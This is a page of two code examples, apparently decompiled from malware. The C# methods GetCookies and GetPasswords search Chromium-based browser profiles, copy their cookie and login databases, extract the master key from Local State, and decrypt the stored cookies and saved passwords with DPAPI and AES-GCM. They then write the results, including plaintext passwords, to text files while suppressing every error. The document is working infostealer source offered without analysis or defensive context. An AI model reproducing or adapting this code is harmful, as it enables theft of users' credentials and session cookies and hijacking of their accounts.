예제 #1
0
 // Token: 0x0600002A RID: 42 RVA: 0x00007340 File Offset: 0x00005540
 public static void GetCookies(string path2save)
 {
     try
     {
         List <string> list  = new List <string>();
         List <string> list2 = new List <string>();
         list2.Add(Help.AppDate);
         list2.Add(Help.LocalData);
         List <string> list3 = new List <string>();
         foreach (string path in list2)
         {
             try
             {
                 list3.AddRange(Directory.GetDirectories(path));
             }
             catch
             {
             }
         }
         foreach (string text in list3)
         {
             string   text2 = "";
             string[] array = null;
             try
             {
                 list.AddRange(Directory.GetFiles(text, "Cookies", SearchOption.AllDirectories));
                 array = Directory.GetFiles(text, "Cookies", SearchOption.AllDirectories);
             }
             catch
             {
             }
             if (array != null)
             {
                 foreach (string text3 in array)
                 {
                     try
                     {
                         if (File.Exists(text3))
                         {
                             string text4 = "Unknown";
                             foreach (string text5 in Chromium.BrowsersName)
                             {
                                 if (text.Contains(text5))
                                 {
                                     text4 = text5;
                                 }
                             }
                             string sourceFileName  = text3;
                             string sourceFileName2 = text3 + "\\..\\..\\Local State";
                             if (File.Exists(Chromium.bd))
                             {
                                 File.Delete(Chromium.bd);
                             }
                             if (File.Exists(Chromium.ls))
                             {
                                 File.Delete(Chromium.ls);
                             }
                             File.Copy(sourceFileName, Chromium.bd);
                             File.Copy(sourceFileName2, Chromium.ls);
                             SqlHandler sqlHandler = new SqlHandler(Chromium.bd);
                             new List <PassData>();
                             sqlHandler.ReadTable("cookies");
                             string   text6  = File.ReadAllText(Chromium.ls);
                             string[] array4 = Regex.Split(text6, "\"");
                             int      num    = 0;
                             string[] array3 = array4;
                             for (int j = 0; j < array3.Length; j++)
                             {
                                 if (array3[j] == "encrypted_key")
                                 {
                                     text6 = array4[num + 2];
                                     break;
                                 }
                                 num++;
                             }
                             byte[] key      = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text6)).Remove(0, 5)), null);
                             int    rowCount = sqlHandler.GetRowCount();
                             for (int k = 0; k < rowCount; k++)
                             {
                                 try
                                 {
                                     string value = sqlHandler.GetValue(k, 12);
                                     byte[] bytes = Encoding.Default.GetBytes(value);
                                     try
                                     {
                                         string text7;
                                         if (value.StartsWith("v10"))
                                         {
                                             byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>();
                                             text7 = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv);
                                         }
                                         else
                                         {
                                             text7 = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null));
                                         }
                                         string value2 = sqlHandler.GetValue(k, 1);
                                         string value3 = sqlHandler.GetValue(k, 2);
                                         string value4 = sqlHandler.GetValue(k, 4);
                                         string value5 = sqlHandler.GetValue(k, 5);
                                         string value6 = sqlHandler.GetValue(k, 6);
                                         text2 += string.Format("{0}\tFALSE\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", new object[]
                                         {
                                             value2,
                                             value4,
                                             value6.ToUpper(),
                                             value5,
                                             value3,
                                             text7
                                         });
                                         Chromium.Cookies++;
                                     }
                                     catch
                                     {
                                     }
                                 }
                                 catch
                                 {
                                 }
                             }
                             if (File.Exists(Chromium.bd))
                             {
                                 File.Delete(Chromium.bd);
                             }
                             if (File.Exists(Chromium.ls))
                             {
                                 File.Delete(Chromium.ls);
                             }
                             if (text4 == "Unknown")
                             {
                                 File.AppendAllText(path2save + "\\Cookies_" + text4 + ".txt", text2);
                             }
                             else
                             {
                                 File.WriteAllText(path2save + "\\Cookies_" + text4 + ".txt", text2);
                             }
                         }
                     }
                     catch
                     {
                     }
                 }
             }
         }
     }
     catch
     {
     }
 }
예제 #2
0
 // Token: 0x06000028 RID: 40 RVA: 0x00006A28 File Offset: 0x00004C28
 public static void GetPasswords(string path2save)
 {
     try
     {
         List <string> list  = new List <string>();
         List <string> list2 = new List <string>();
         list2.Add(Help.AppDate);
         list2.Add(Help.LocalData);
         List <string> list3 = new List <string>();
         foreach (string path in list2)
         {
             try
             {
                 list3.AddRange(Directory.GetDirectories(path));
             }
             catch
             {
             }
         }
         foreach (string text in list3)
         {
             string[] array = null;
             string   text2 = "";
             try
             {
                 list.AddRange(Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories));
                 array = Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories);
             }
             catch
             {
             }
             if (array != null)
             {
                 foreach (string text3 in array)
                 {
                     try
                     {
                         if (File.Exists(text3))
                         {
                             string text4 = "Unknown";
                             foreach (string text5 in Chromium.BrowsersName)
                             {
                                 if (text.Contains(text5))
                                 {
                                     text4 = text5;
                                 }
                             }
                             string sourceFileName  = text3;
                             string sourceFileName2 = text3 + "\\..\\..\\Local State";
                             if (File.Exists(Chromium.bd))
                             {
                                 File.Delete(Chromium.bd);
                             }
                             if (File.Exists(Chromium.ls))
                             {
                                 File.Delete(Chromium.ls);
                             }
                             File.Copy(sourceFileName, Chromium.bd);
                             File.Copy(sourceFileName2, Chromium.ls);
                             SqlHandler sqlHandler = new SqlHandler(Chromium.bd);
                             new List <PassData>();
                             sqlHandler.ReadTable("logins");
                             string   text6  = File.ReadAllText(Chromium.ls);
                             string[] array4 = Regex.Split(text6, "\"");
                             int      num    = 0;
                             string[] array3 = array4;
                             for (int j = 0; j < array3.Length; j++)
                             {
                                 if (array3[j] == "encrypted_key")
                                 {
                                     text6 = array4[num + 2];
                                     break;
                                 }
                                 num++;
                             }
                             byte[] key      = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text6)).Remove(0, 5)), null);
                             int    rowCount = sqlHandler.GetRowCount();
                             for (int k = 0; k < rowCount; k++)
                             {
                                 try
                                 {
                                     string value = sqlHandler.GetValue(k, 5);
                                     byte[] bytes = Encoding.Default.GetBytes(value);
                                     string str   = "";
                                     try
                                     {
                                         if (value.StartsWith("v10") || value.StartsWith("v11"))
                                         {
                                             byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>();
                                             str = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv);
                                         }
                                         else
                                         {
                                             str = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null));
                                         }
                                     }
                                     catch
                                     {
                                     }
                                     text2 = text2 + "Url: " + sqlHandler.GetValue(k, 1) + "\r\n";
                                     text2 = text2 + "Login: "******"\r\n";
                                     text2 = text2 + "Passwords: " + str + "\r\n";
                                     text2 = text2 + "Browser: " + text4 + "\r\n\r\n";
                                     Chromium.Passwords++;
                                 }
                                 catch
                                 {
                                 }
                             }
                             if (File.Exists(Chromium.bd))
                             {
                                 File.Delete(Chromium.bd);
                             }
                             if (File.Exists(Chromium.ls))
                             {
                                 File.Delete(Chromium.ls);
                             }
                             if (text4 == "Unknown")
                             {
                                 File.AppendAllText(path2save + "\\Passwords_" + text4 + ".txt", text2);
                             }
                             else
                             {
                                 File.WriteAllText(path2save + "\\Passwords_" + text4 + ".txt", text2);
                             }
                         }
                     }
                     catch
                     {
                     }
                 }
             }
         }
     }
     catch
     {
     }
 }